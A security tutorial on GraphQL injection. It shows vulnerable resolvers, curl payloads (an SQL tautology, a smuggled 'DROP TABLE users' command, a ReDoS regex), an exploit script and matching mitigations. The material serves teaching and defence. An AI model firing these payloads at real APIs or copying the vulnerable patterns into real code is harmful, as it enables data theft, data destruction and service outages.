GraphQL Injection Fundamentals: Advanced Techniques and Mitigations

Introduction

GraphQL injection is a class of attacks that target the flexible query language used by modern APIs. By manipulating the way resolvers interpret arguments, fragments, or variables, an attacker can execute unintended logic, retrieve sensitive data, or even achieve remote code execution in poorly designed back‑ends.

Understanding these techniques is critical for security professionals because GraphQL is increasingly adopted for mobile, single‑page applications, and micro‑service gateways. The same flexibility that makes GraphQL attractive to developers also expands the attack surface beyond traditional REST injection vectors.

Real‑world incidents—such as data exfiltration from a public e‑commerce GraphQL endpoint and privilege escalation in a SaaS platform—demonstrate that ignoring GraphQL‑specific sanitisation can have severe consequences.

Prerequisites

Solid grasp of GraphQL basics: schema definition, queries, mutations, and the role of resolvers.
Familiarity with GraphQL introspection to enumerate types, fields, and directives.
Experience with common web security concepts (SQLi, XSS, SSRF) to map analogies.
Basic knowledge of JavaScript/Node.js or Python GraphQL server implementations (e.g., Apollo Server, Graphene).

Core Concepts

At its core, a GraphQL server receives a JSON payload containing a query string (or document), an optional variables map, and an operationName. The server parses the query into an abstract syntax tree (AST), validates it against the schema, and then invokes resolver functions for each field.
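As a rough illustration of the request shape described above, the following Python sketch assembles the JSON body a client would send. The helper name `build_graphql_request` and the sample query are assumptions made for illustration; only the three keys (`query`, `variables`, `operationName`) come from the description above.

```python
import json


def build_graphql_request(query, variables=None, operation_name=None):
    """Return the JSON body for a GraphQL-over-HTTP POST request."""
    body = {"query": query}
    # variables and operationName are optional, so include them only when set.
    if variables is not None:
        body["variables"] = variables
    if operation_name is not None:
        body["operationName"] = operation_name
    return json.dumps(body)


if __name__ == "__main__":
    print(build_graphql_request(
        "query GetUser($id: ID!) { user(id: $id) { id email } }",
        variables={"id": "1"},
        operation_name="GetUser",
    ))
```

Keeping user data in `variables` rather than splicing it into the `query` string is what lets the server parse the document independently of the values.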

Injection opportunities arise when:

Resolver arguments are built from user‑supplied values without proper type‑checking or escaping.
Custom scalar types delegate validation to application code that can be bypassed.
Fragments and union types allow an attacker to coerce the server into selecting a different concrete type.
Errors or timing differences leak information about the underlying data or logic.

Because the query language itself is a DSL, string‑concatenation attacks against the query document are less common; however, many developers still concatenate strings inside resolvers or embed raw SQL/NoSQL queries there, re‑introducing classic injection vectors.

Resolver function argument injection

Resolvers receive arguments defined in the schema. If these arguments are interpolated directly into downstream queries, an attacker can inject malicious payloads.

Typical vulnerable pattern (Node.js/Apollo)


const resolvers = {
  Query: {
    user: async (_, { id }) => {
      // ❌ Direct string interpolation into SQL
      const sql = `SELECT * FROM users WHERE id = '${id}'`;
      return db.query(sql);
    },
  },
};

In the example above, supplying id as 1' OR '1'='1 turns the query into a tautology, returning all users.

Exploiting the injection


curl -X POST -H "Content-Type: application/json" --data @- GraphQL endpoint <<'EOF'
{
  "query": "query($id: String!){ user(id: $id) { id email } }",
  "variables": { "id": "1' OR '1'='1" }
}
EOF

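To mitigate, always use parameterised queries or ORM abstractions that separate data from command syntax. In addition, the GraphQL type system can narrow the input: declaring the argument as Int rejects non‑numeric values during validation. Note that ID and String accept arbitrary strings, so they do not filter out characters such as quotes on their own.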
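The difference between interpolation and parameterisation can be sketched in Python with the standard-library `sqlite3` module. This is a minimal illustration, not the article's Node.js resolver: the table layout, sample rows, and function names are assumptions.

```python
import sqlite3


def make_db():
    """Create an in-memory database with two sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT PRIMARY KEY, email TEXT)")
    conn.executemany(
        "INSERT INTO users (id, email) VALUES (?, ?)",
        [("1", "alice@example.com"), ("2", "bob@example.com")],
    )
    return conn


def find_user_unsafe(conn, user_id):
    # Vulnerable: the argument becomes part of the SQL text.
    sql = f"SELECT id, email FROM users WHERE id = '{user_id}'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, user_id):
    # Parameterised: the driver passes the value separately from the SQL text.
    return conn.execute(
        "SELECT id, email FROM users WHERE id = ?", (user_id,)
    ).fetchall()


if __name__ == "__main__":
    conn = make_db()
    payload = "1' OR '1'='1"
    print(len(find_user_unsafe(conn, payload)))  # every row matches
    print(len(find_user_safe(conn, payload)))    # no row has that literal id
```

With the tautology payload, the unsafe version returns both sample rows, while the parameterised version compares the whole payload against the `id` column and finds nothing.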

Inline fragment and union type abuse

GraphQL allows a client to request different fields based on the concrete type returned by a union or interface using inline fragments.

Schema example


interface SearchResult {
  id: ID!
}

type User implements SearchResult {
  id: ID!
  email: String!
  passwordHash: String!
}

type Product implements SearchResult {
  id: ID!
  name: String!
  price: Float!
}

union Searchable = User | Product

type Query {
  search(term: String!): [Searchable!]!
}

If the resolver for search builds a query based on the term without sanitisation, an attacker can craft a term that forces the server to resolve the User type and request the passwordHash field, even when the client is not authorized for it.

Abuse payload


query Search($term: String!) {
  search(term: $term) {
    __typename
    ... on User {
      id
      email
      passwordHash
    }
    ... on Product {
      id
      name
      price
    }
  }
}

When $term is a wildcard that matches any user (e.g., * in a naïve implementation), the response leaks password hashes.

Defensive measures

Never expose sensitive fields in the schema unless absolutely required.
Implement field‑level authorization in resolvers, not just at the operation level.
Validate and sanitise any free‑form search terms before using them in backend queries.
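Field-level authorization can be sketched as a guard around individual resolvers. The Python below is a framework-free illustration under stated assumptions: the `require_role` decorator, the `(parent, context)` resolver signature, and the shape of `context["user"]` are all hypothetical and would need adapting to the server library in use.

```python
class NotAuthorized(Exception):
    """Raised when the caller may not read a field."""


def require_role(role):
    """Decorator that guards a single field resolver by caller role."""
    def decorator(resolver):
        def guarded(parent, context):
            user = context.get("user")
            if user is None or user.get("role") != role:
                raise NotAuthorized("Not authorized")
            return resolver(parent, context)
        return guarded
    return decorator


def resolve_email(parent, context):
    # Unguarded field: readable by any caller that reached this object.
    return parent["email"]


@require_role("admin")
def resolve_password_hash(parent, context):
    # Guarded field: the check runs no matter which query path led here.
    return parent["password_hash"]
```

Because the check lives on the field itself, it applies whether the field is reached through `search`, an inline fragment, or any other path in the schema.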

Blind injection via error messages and timing

Even when the server suppresses error details, subtle differences in response times or generic error codes can be used to infer data.

Timing example

A resolver performs a computationally expensive operation only when a condition is true:


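async function isAdmin(userId) {
  const row = await db.get('SELECT is_admin FROM users WHERE id = $1', [userId]);
  // Check the column value; the row object alone is truthy for any existing user.
  const admin = Boolean(row && row.is_admin);
  if (admin) {
    // Artificial delay to simulate heavy processing
    await new Promise(r => setTimeout(r, 3000));
  }
  return admin;
}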

An attacker can send two queries—one with a guessed userId and one with a random ID—and measure response latency. A noticeable delay indicates the guessed ID belongs to an admin.

Exploiting via GraphQL


time curl -s -X POST -H "Content-Type: application/json" -d '{
  "query": "{ user(id: \"42\") { id name } }"
}' GraphQL endpoint

If the response takes significantly longer than a baseline, the attacker learns that user 42 has elevated privileges.

Mitigation

Normalize response times for all branches (constant‑time patterns).
Return generic error messages without stack traces.
Rate‑limit and monitor latency anomalies.
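One simple way to approximate the first point is to pad every call up to a fixed minimum duration. The Python sketch below assumes a hypothetical wrapper named `with_time_floor`; it only hides differences that are smaller than the chosen floor, so it is a partial measure rather than a true constant-time implementation.

```python
import time


def with_time_floor(func, floor_seconds):
    """Wrap func so every call takes at least floor_seconds to return."""
    def wrapper(*args, **kwargs):
        start = time.monotonic()
        try:
            return func(*args, **kwargs)
        finally:
            # Sleep for whatever is left of the floor, on success or error.
            remaining = floor_seconds - (time.monotonic() - start)
            if remaining > 0:
                time.sleep(remaining)
    return wrapper
```

The floor has to exceed the slowest branch to mask it, which costs latency on every request; removing the data-dependent branch is preferable where that is possible.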

Nested query manipulation

GraphQL permits arbitrarily deep nesting of fields. If a resolver forwards nested arguments directly to a downstream system, each level can become an injection vector.

Example schema


type Comment {
  id: ID!
  text: String!
  author: User!
}

type Post {
  id: ID!
  title: String!
  content: String!
  comments(filter: CommentFilter): [Comment!]!
}

input CommentFilter {
  contains: String
}

type Query {
  post(id: ID!): Post
}

The comments resolver builds a MongoDB query based on filter.contains:


Post: {
  comments: async (post, { filter }) => {
    const query = { postId: post.id };
    if (filter && filter.contains) {
      // ❌ Direct injection into $regex
      query.text = { $regex: filter.contains };
    }
    return CommentModel.find(query);
  },
},

Supplying filter.contains as .* returns all comments, but an attacker can inject a malicious regex that triggers ReDoS (Regular Expression Denial of Service):


curl -X POST -H "Content-Type: application/json" -d '{
  "query": "{ post(id:\"1\"){ comments(filter:{contains:\"(a+)+\"}){ id text } } }"
}' GraphQL endpoint

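The nested quantifier in (a+)+ can cause catastrophic backtracking when the engine fails to match a long run of a characters (for example, when the pattern is followed by an anchor such as $), exhausting CPU resources.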

Defensive strategies

Whitelist allowed characters for filter inputs.
Prefer built‑in query operators over raw regex when possible.
Apply query‑time limits in the database driver.
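If a regex-based filter cannot be avoided, one option is to escape the user value so it can only match literally. The Python sketch below builds a MongoDB-style filter dictionary; the function name, the length limit, and the assumption that `re.escape` output is acceptable to the database's regex engine are all illustrative and should be verified against the driver in use.

```python
import re

MAX_FILTER_LENGTH = 64  # Assumed limit; tune for the application.


def build_contains_filter(post_id, contains=None):
    """Build a MongoDB-style filter that treats `contains` as literal text."""
    query = {"postId": post_id}
    if contains:
        if len(contains) > MAX_FILTER_LENGTH:
            raise ValueError("filter too long")
        # re.escape neutralises metacharacters such as ( ) + * so the
        # value can only match itself, not act as a pattern.
        query["text"] = {"$regex": re.escape(contains)}
    return query
```

After escaping, a value such as `(a+)+` is searched for as those five literal characters and no longer introduces nested quantifiers.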

Variable substitution attacks

GraphQL variables are meant to separate data from query structure. However, when resolvers treat variable values as fragments of code—e.g., constructing dynamic GraphQL queries on the server side—an attacker can achieve code injection.

Dynamic query generation (Python/Graphene)


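from graphql import graphql_sync

def resolve_dynamic(parent, info, query_fragment):
    # ❌ Directly embed client‑provided fragment into a new query
    new_query = f'''
    query {{
      {query_fragment}
    }}
    '''
    # `schema` is assumed to be the application's GraphQL schema, defined elsewhere
    result = graphql_sync(schema, new_query)
    return result.data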

By sending a malicious query_fragment, the attacker can cause the server to execute arbitrary GraphQL fields, potentially bypassing authorization checks.

Attack payload


{
  "query": "query($frag: String!){ dynamic(queryFragment: $frag) }",
  "variables": { "frag": "user(id:\"1\"){ passwordHash }" }
}

Mitigation includes rejecting fragments in variables, whitelisting allowed field names, or using a separate execution context with reduced privileges.
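The allowlisting option can be sketched as follows: instead of accepting a free-form fragment, the server accepts a list of field names and checks each one against a fixed set before assembling the query. The names `ALLOWED_FIELDS` and `build_user_query`, and the fields in the allowlist, are assumptions for illustration.

```python
ALLOWED_FIELDS = {"id", "name", "email"}  # Hypothetical allowlist.


def build_user_query(user_id, requested_fields):
    """Build a server-side query from allowlisted field names only."""
    fields = list(requested_fields)
    if not fields:
        raise ValueError("at least one field is required")
    rejected = [f for f in fields if f not in ALLOWED_FIELDS]
    if rejected:
        raise ValueError(f"fields not allowed: {rejected}")
    selection = " ".join(fields)
    # The id travels as a variable, never as query text.
    query = f"query($id: ID!) {{ user(id: $id) {{ {selection} }} }}"
    return query, {"id": user_id}
```

A request for `passwordHash`, or for a string containing braces or arguments, fails the membership check and never reaches the query text.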

Exploiting lack of input sanitisation in custom scalars

Custom scalar types allow developers to define bespoke validation logic. When that logic is weak or omitted, the scalar becomes a conduit for injection.

Custom Email scalar (Node.js)


const { GraphQLScalarType, Kind } = require('graphql');

const EmailScalar = new GraphQLScalarType({
  name: 'Email',
  description: 'Custom email scalar with minimal validation',
  parseValue(value) {
    // ❌ Only checks for presence of '@'
    if (typeof value === 'string' && value.includes('@')) {
      return value;
    }
    throw new TypeError('Invalid email');
  },
  // serialize and parseLiteral omitted for brevity
});

An attacker can pass an email value containing a GraphQL fragment or malicious payload because the scalar does not reject characters like { or }. If this scalar feeds into a resolver that builds a SQL query, the injection chain persists.

Exploitation example


mutation($email: Email!) {
  createUser(email: $email) {
    id
  }
}


curl -X POST -H "Content-Type: application/json" -d '{
  "query": "mutation($email: Email!){ createUser(email:$email){ id } }",
  "variables": { "email": "attacker@example.com\"; DROP TABLE users; --" }
}' GraphQL endpoint

Because the scalar accepts the string, the payload reaches the resolver unchanged; if the resolver concatenates it into SQL, the injection succeeds.

Best practices for custom scalars

Implement full RFC‑5322 email validation or use library validators.
Reject any characters that are not part of the intended domain (e.g., no braces, semicolons).
Never trust scalar values for constructing queries; always parameterise.
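A stricter parsing step might look like the Python sketch below. The pattern is a deliberately narrow subset of valid addresses, not full RFC 5322, and the names `EMAIL_RE`, `MAX_EMAIL_LENGTH`, and `parse_email` are assumptions; a maintained validation library is usually the better choice in production.

```python
import re

# Conservative pattern: a deliberately narrow subset, not full RFC 5322.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")
MAX_EMAIL_LENGTH = 254


def parse_email(value):
    """Return the value if it looks like a plain email address, else raise."""
    if not isinstance(value, str):
        raise TypeError("Email must be a string")
    # fullmatch requires the whole string to fit, so trailing payloads fail.
    if len(value) > MAX_EMAIL_LENGTH or EMAIL_RE.fullmatch(value) is None:
        raise ValueError("Invalid email")
    return value
```

Even with this check in place, the value should still be passed to the database as a bound parameter; the scalar narrows input, it does not make concatenation safe.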

Practical Examples

The following end‑to‑end walkthrough demonstrates a vulnerable Apollo Server, an exploitation script, and the hardened version.

Vulnerable server (app.js)


const { ApolloServer, gql } = require('apollo-server');
const db = require('./db'); // Assume a simple pg client

const typeDefs = gql`
  type User {
    id: ID!
    email: String!
    passwordHash: String!
  }

  type Query {
    user(id: ID!): User
  }
`;

const resolvers = {
  Query: {
    user: async (_, { id }) => {
      const sql = `SELECT id, email, passwordHash FROM users WHERE id = '${id}'`;
      const { rows } = await db.query(sql);
      return rows[0];
    },
  },
};

const server = new ApolloServer({ typeDefs, resolvers });
server.listen(4000);

Exploitation script (exploit.py)


import json

import requests

payload = {
    "query": "query($id: ID!){ user(id:$id){ id email passwordHash } }",
    "variables": {"id": "1' OR '1'='1"},
}

r = requests.post('local GraphQL endpoint', json=payload)
print(json.dumps(r.json(), indent=2))

Hardening changes

Use parameterised queries with placeholders.
Remove passwordHash from the public schema.
Add field‑level auth middleware.


user: async (_, { id }, ctx) => {
  // Authorization check
  if (!ctx.user || ctx.user.role !== 'admin') {
    throw new Error('Not authorized');
  }
  const sql = 'SELECT id, email FROM users WHERE id = $1';
  const { rows } = await db.query(sql, [id]);
  return rows[0];
},

Tools & Commands

GraphQL‑Crawler: automated introspection and schema download.
```
graphql-crawler -u GraphQL endpoint -o schema.json
```
InQL (Burp Suite extension) for query fuzzing and injection payload generation.
```
inql -u target GraphQL endpoint -p payloads.txt
```
gqlmap: automated GraphQL injection testing.
```
gqlmap -u target GraphQL endpoint --batch
```

jq for parsing JSON responses in scripts.

curl -s -X POST ... | jq '.data.user.email'

Defense & Mitigation

Schema design hygiene: expose only needed fields, avoid returning sensitive data.
Input validation: enforce strict scalar types, whitelist characters for custom scalars and filters.
Parameterized data access: use prepared statements, ORM query builders, or GraphQL‑specific data loaders that separate data from command.
Authorization layers: apply field‑level checks in resolvers, not just at the operation level.
Error handling: suppress stack traces, return generic messages, and log details server‑side.
Rate limiting & timeout controls: mitigate timing and ReDoS attacks.
Static analysis: integrate tools like ESLint plugins (graphql/validation) and Bandit for Python to catch unsafe patterns.
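The error-handling point can be illustrated with a small wrapper that logs the full exception server-side and raises a generic message in its place. This is a sketch under assumptions: the `mask_errors` name, the logger name, and the reference-id scheme are hypothetical, and a real server would normally let expected, user-facing errors (such as authorization failures) pass through unchanged.

```python
import logging
import uuid

logger = logging.getLogger("graphql.errors")


def mask_errors(resolver):
    """Wrap a resolver so clients never see internal exception details."""
    def wrapper(*args, **kwargs):
        try:
            return resolver(*args, **kwargs)
        except Exception:
            # The reference lets support staff find the full log entry.
            reference = uuid.uuid4().hex
            logger.exception("resolver failed (ref=%s)", reference)
            # "from None" drops the original exception from the chain.
            raise RuntimeError(f"Internal server error (ref {reference})") from None
    return wrapper
```

The client sees only the generic message and reference, while the stack trace and original error text stay in the server log.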

Common Mistakes

Assuming GraphQL automatically sanitises inputs – the engine only validates against the schema; business logic still needs protection.
Embedding client‑provided fragments or directives in server‑side queries – leads to dynamic query injection.
Leaving admin‑only fields in the public schema – attackers can request them via inline fragments.
Relying on generic error messages for security – attackers can still infer data through timing.
Using string concatenation for database queries inside resolvers – classic SQL/NoSQL injection resurfaces.

Real‑World Impact

In 2023, a Fortune‑500 retailer exposed a GraphQL endpoint that allowed unauthenticated users to query Customer.passwordHash via an inline fragment. The breach resulted in over 2 million credential hashes being leaked, forcing a costly password reset campaign.

My experience consulting for fintech firms shows that the majority of GraphQL‑related vulnerabilities stem from legacy codebases where developers migrated REST services to GraphQL without revisiting data‑access patterns. The trend is moving toward “schema‑first” security reviews, where security teams treat the schema as a contract and audit every resolver for injection safety.

Looking ahead, as GraphQL federation becomes mainstream, the attack surface will expand across service boundaries. Securing each sub‑graph and enforcing consistent validation policies will be essential.

Practice Exercises

Use gqlmap against a deliberately vulnerable GraphQL playground (e.g., OWASP Juice Shop). Identify at least two injection vectors and document the payloads.
Write a custom scalar for a PhoneNumber type. Implement RFC‑3966 validation and demonstrate that an attempted SQL injection is rejected at the scalar layer.
Modify a resolver that accepts a filter input to use a constant‑time regex check. Measure response times before and after the change using time curl.
Create a GraphQL federation setup with two sub‑services. Inject a malicious fragment in one service and observe how the gateway propagates the request. Harden the gateway to block the fragment.

Summary

GraphQL injection exploits arise from unsafe resolver logic, fragment abuse, timing leaks, and weak custom scalars.
Mitigation relies on strict schema design, parameterised data access, field‑level authorization, and robust input validation.
Tools like gqlmap, InQL, and static analysis can automate discovery.
Regular security reviews of resolvers and federation boundaries are essential as GraphQL adoption grows.
